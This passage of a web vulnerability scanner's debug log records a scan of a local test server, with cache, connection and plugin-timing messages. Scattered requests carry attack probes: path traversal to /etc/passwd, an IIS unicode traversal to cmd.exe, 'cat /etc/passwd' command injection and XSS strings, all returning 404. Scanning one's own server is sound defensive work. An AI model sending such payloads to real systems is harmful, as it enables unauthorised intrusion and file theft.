avoid high memory usage issues. The current GrepIn DiskDict size is 4533. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4534. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4535. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/squirrelmail/src/read_body.php returned HTTP code "404" (id=24876,from_cache=0,grep=1,rtt=0.16,did=YOc42RAA) [Wed Feb 12 10:04:37 2020 - debug] vulners_db.grep(uri="http://localhost:9090/89/") took 0.15s to run [Wed Feb 12 10:04:37 2020 - debug] clamav.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/_vti_bin/fpsrvadm.exe returned HTTP code "404" (id=24875,from_cache=0,grep=1,rtt=0.04,did=Ff1m65IF) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4536. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2487. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/ms_proxy_auth_query/ returned HTTP code "404" (id=24877,from_cache=0,grep=1,rtt=0.16,did=6RFu09gg) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/perl/ returned HTTP code "404" (id=24878,from_cache=0,grep=1,rtt=0.23,did=YOOEgLAF) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/rightfax/fuwww.dll/ returned HTTP code "404" (id=24879,from_cache=0,grep=1,rtt=0.19,did=NVRKaYTk) [Wed Feb 12 10:04:37 2020 - debug] OPTIONS http://localhost:9090/ returned HTTP code "200" (id=24880,from_cache=0,grep=1,rtt=0.19,did=tRNUzUns) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/interchange/ returned HTTP code "404" (id=24881,from_cache=0,grep=1,rtt=0.11,did=xF51mRTj) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/scripts/fpadmin.htm returned HTTP code "404" (id=24883,from_cache=0,grep=1,rtt=0.02,did=9FbzjxMk) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/acart2_0/error.asp?msg= returned HTTP code "404" (id=24884,from_cache=0,grep=1,rtt=0.05,did=GvFMjaiu) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/.passwd returned HTTP code "404" (id=24885,from_cache=0,grep=1,rtt=0.07,did=3ElW3sCN) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/content/base/build/explorer/none.php?/etc/passwd= returned HTTP code "404" (id=24888,from_cache=0,grep=1,rtt=0.12,did=b5kJgLNn) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/test/jsp/pageSession.jsp returned HTTP code "404" (id=24890,from_cache=0,grep=1,rtt=0.11,did=gQX4S11P) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.dk returned HTTP code "404" (id=24889,from_cache=0,grep=1,rtt=0.13,did=RM3tXtsx) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2488. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.pt-br returned HTTP code "404" (id=24887,from_cache=0,grep=1,rtt=0.05,did=LRf3JrbG) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/imageFolio.cgi returned HTTP code "404" (id=24886,from_cache=0,grep=1,rtt=0.08,did=JpU3FUF7) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/utils/sprc.asp returned HTTP code "404" (id=24882,from_cache=0,grep=1,rtt=0.05,did=VkvqBtlj) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13207, 'reject-seen-url': 5846, 'reject-out-of-scope': 216, 'accept': 4981} [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13207, 'reject-seen-url': 5846, 'reject-out-of-scope': 216, 'accept': 4981} [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13207, 'reject-seen-url': 5846, 'reject-out-of-scope': 216, 'accept': 4981} [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13207, 'reject-seen-url': 5846, 'reject-out-of-scope': 216, 'accept': 4981} [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13207, 'reject-seen-url': 5846, 'reject-out-of-scope': 216, 'accept': 4981} [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13207, 'reject-seen-url': 5846, 'reject-out-of-scope': 216, 'accept': 4981} [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13207, 'reject-seen-url': 5846, 'reject-out-of-scope': 216, 'accept': 4981} [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13207, 'reject-seen-url': 5846, 'reject-out-of-scope': 216, 'accept': 4981} [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=24893,from_cache=0,grep=1,rtt=0.22,did=8ByScM58) [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/_private/registrations.htm returned HTTP code "404" (id=24892,from_cache=0,grep=1,rtt=0.05,did=T1hhr3Xq) [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/utm/utm_stat returned HTTP code "404" (id=24895,from_cache=0,grep=1,rtt=0.15,did=tVgqACnq) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4536. [Wed Feb 12 10:04:37 2020 - debug] url_session.grep(uri="http://localhost:9090/89/") took 0.01s to run [Wed Feb 12 10:04:37 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] objects.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] error_500.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] meta_tags.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] password_profiling.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] click_jacking.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] lang.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/.profile returned HTTP code "404" (id=24894,from_cache=0,grep=1,rtt=0.13,did=NQ9kpVxR) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2489. [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/lcgi/ndsobj.nlm returned HTTP code "404" (id=24899,from_cache=0,grep=1,rtt=0.11,did=pj03GQEl) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c dir= returned HTTP code "404" (id=24897,from_cache=0,grep=1,rtt=0.19,did=yygHeheY) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/shop/database/metacart.mdb returned HTTP code "404" (id=24896,from_cache=0,grep=1,rtt=0.12,did=kCi4CeEf) [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/theme1/selector?button=status,monitor,session&button_url=/system/status/status\\">,/system/status/moniter,/system/status/session returned HTTP code "404" (id=24891,from_cache=0,grep=1,rtt=0.13,did=l5hQgO2w) [Wed Feb 12 10:04:37 2020 - debug] localhost:9090 connection pool stats (free:335 / in_use:4 / max:50 / total:339) [Wed Feb 12 10:04:37 2020 - debug] Connections with more in use time: (170522fa0a1f3e00, 0.31 sec) (40a614a8d4943148, 0.10 sec) (bf412558545487c2, 0.09 sec) (768418029b34e139, 0.08 sec) (cfbfcc6cbaffdb7d, 0.06 sec) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4536. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/webcalendar/colors.php?color= returned HTTP code "404" (id=24902,from_cache=0,grep=1,rtt=0.01,did=GXByit8d) [Wed Feb 12 10:04:37 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/@PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=24903,from_cache=0,grep=1,rtt=0.05,did=C0ltZl3o) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2490. [Wed Feb 12 10:04:37 2020 - debug] error_pages.grep(uri="http://localhost:9090/89/") took 0.05s to run [Wed Feb 12 10:04:37 2020 - debug] strange_reason.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] cache_control.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_headers.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] ssn.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] oracle.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] feeds.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4537. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/nph-exploitscanget.cgi returned HTTP code "404" (id=24898,from_cache=0,grep=1,rtt=0.11,did=iC0gId5g) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/php/mylog.html?screen=/etc/passwd returned HTTP code "404" (id=24900,from_cache=0,grep=1,rtt=0.07,did=r3E3j6Wm) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/general.chl returned HTTP code "404" (id=24904,from_cache=0,grep=1,rtt=0.18,did=R0BoxQYY) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/data/userlog/log.txt returned HTTP code "404" (id=24905,from_cache=0,grep=1,rtt=0.10,did=hJSMYH1q) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/examples/ returned HTTP code "404" (id=24906,from_cache=0,grep=1,rtt=0.07,did=INZZ9uMW) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2491. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/servlet/DateServlet returned HTTP code "404" (id=24907,from_cache=0,grep=1,rtt=0.13,did=X4jxkOao) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4538. [Wed Feb 12 10:04:37 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/89/") took 0.09s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2492. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2493. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2494. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2495. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/doc/rt/overview-summary.html returned HTTP code "404" (id=24908,from_cache=0,grep=1,rtt=0.09,did=9ns3REYm) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/scripts/ returned HTTP code "404" (id=24911,from_cache=0,grep=1,rtt=0.06,did=e8vRFfdZ) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/admcgi/contents.htm returned HTTP code "404" (id=24912,from_cache=0,grep=1,rtt=0.11,did=D50m7dZZ) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/printenv returned HTTP code "404" (id=24913,from_cache=0,grep=1,rtt=0.15,did=ZrOZQAZA) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/help/contents.htm returned HTTP code "404" (id=24915,from_cache=0,grep=1,rtt=0.11,did=harRDvO9) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13228, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4982} [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/_vti_bin/_vti_cnf/ returned HTTP code "404" (id=24917,from_cache=0,grep=1,rtt=0.05,did=wp0t2aUu) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13228, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4982} [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/.forward returned HTTP code "404" (id=24914,from_cache=0,grep=1,rtt=0.06,did=Vh37nKJU) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13228, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4982} [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/CGImail.exe returned HTTP code "404" (id=24910,from_cache=0,grep=1,rtt=0.33,did=N44fmA7J) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13228, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4982} [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/GWWEB.EXE?HELP=bad-request returned HTTP code "404" (id=24909,from_cache=0,grep=1,rtt=0.12,did=mxcRf5yU) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13228, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4982} [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/scripts/fpcount.exe returned HTTP code "404" (id=24919,from_cache=0,grep=1,rtt=0.09,did=6bC7mPOo) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13228, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4982} [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/ojspdemos/basic/simple/usebean.jsp returned HTTP code "404" (id=24921,from_cache=0,grep=1,rtt=0.14,did=H8AmE08R) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13228, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4982} [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/imagemap returned HTTP code "404" (id=24923,from_cache=0,grep=1,rtt=0.04,did=OlqShCMD) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13228, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4982} [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/.wwwacl returned HTTP code "404" (id=24924,from_cache=0,grep=1,rtt=0.12,did=2YLHuWeF) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13228, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4982} [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/rmp_query returned HTTP code "404" (id=24918,from_cache=0,grep=1,rtt=0.17,did=Mr014F4C) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13228, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4982} [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/servlet/SearchServlet returned HTTP code "404" (id=24925,from_cache=0,grep=1,rtt=0.14,did=5C94gqsq) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13228, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4982} [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/F6SWA.xml returned HTTP code "404" (id=24920,from_cache=0,grep=1,rtt=0.11,did=7lVpa4gz) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13228, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4982} [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/test/jsp/extends2.jsp returned HTTP code "404" (id=24916,from_cache=0,grep=1,rtt=0.19,did=5qMQ3bbd) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13228, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4982} [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.ja.iso2022-jp returned HTTP code "404" (id=24922,from_cache=0,grep=1,rtt=0.13,did=uuw57tUF) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13228, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4982} [Wed Feb 12 10:04:37 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2496. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/search.asp?Search=\\"><=<=&script=>=>=&alert(Vulnerable)=&/script= returned HTTP code "404" (id=24926,from_cache=0,grep=1,rtt=0.29,did=d5vRvjYi) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/acart2_0/admin/error.asp?msg= returned HTTP code "404" (id=24928,from_cache=0,grep=1,rtt=0.05,did=b283fQGa) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4539. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/sca/menu.jsp returned HTTP code "404" (id=24929,from_cache=0,grep=1,rtt=0.04,did=Sw5wlQBk) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/post16.exe returned HTTP code "404" (id=24930,from_cache=0,grep=1,rtt=0.06,did=yfsHLkwF) [Wed Feb 12 10:04:37 2020 - debug] symfony.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] private_ip.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] motw.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] meta_generator.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] retirejs.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2497. [Wed Feb 12 10:04:37 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:37 2020 - debug] serialized_object.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] blank_body.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] credit_cards.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] websockets_links.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] csp.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] dom_xss.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] vulners_db.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] keys.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] expect_ct.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] clamav.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/shop/normal_html.cgi?file=../../../../../../etc/issue\x00 returned HTTP code "404" (id=24931,from_cache=0,grep=1,rtt=0.01,did=4tEOEMG5) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4540. [Wed Feb 12 10:04:37 2020 - debug] svn_users.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/soapConfig.xml returned HTTP code "404" (id=24927,from_cache=0,grep=1,rtt=0.08,did=8WEe3eKV) [Wed Feb 12 10:04:37 2020 - debug] localhost:9090 connection pool stats (free:333 / in_use:4 / max:50 / total:337) [Wed Feb 12 10:04:37 2020 - debug] Connections with more in use time: (768418029b34e139, 0.13 sec) (e66b838c6838e0ac, 0.10 sec) (f5db311abe562806, 0.09 sec) (0f0e8052aec055dc, 0.03 sec) [Wed Feb 12 10:04:37 2020 - debug] file_upload.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] objects.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] error_500.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] meta_tags.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] password_profiling.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] click_jacking.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] lang.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.ee returned HTTP code "404" (id=24933,from_cache=0,grep=1,rtt=0.09,did=rs4Jsrb0) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/reports/temp/ returned HTTP code "404" (id=24935,from_cache=0,grep=1,rtt=0.11,did=jIdnr6Hu) [Wed Feb 12 10:04:37 2020 - debug] error_pages.grep(uri="http://localhost:9090/page/") took 0.06s to run [Wed Feb 12 10:04:37 2020 - debug] strange_reason.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] cache_control.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4541. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/Sites/Samples/Knowledge/Push/ViewCode.asp returned HTTP code "404" (id=24938,from_cache=0,grep=1,rtt=0.19,did=XGMkBlsM) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/admin/system.php3?cmd=cat /etc/passwd returned HTTP code "404" (id=24932,from_cache=0,grep=1,rtt=0.06,did=AY6ReMeM) [Wed Feb 12 10:04:37 2020 - debug] url_session.grep(uri="http://localhost:9090/page/") took 0.17s to run [Wed Feb 12 10:04:37 2020 - debug] ssn.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] oracle.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] feeds.grep(uri="http://localhost:9090/page/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/_private/registrations.txt returned HTTP code "404" (id=24936,from_cache=0,grep=1,rtt=0.09,did=EGtNWPdv) [Wed Feb 12 10:04:37 2020 - debug] strange_headers.grep(uri="http://localhost:9090/page/") took 0.12s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/help/home.html returned HTTP code "404" (id=24939,from_cache=0,grep=1,rtt=0.13,did=YcQ8cBiy) [Wed Feb 12 10:04:37 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/page/") took 0.08s to run [Wed Feb 12 10:04:37 2020 - debug] GET 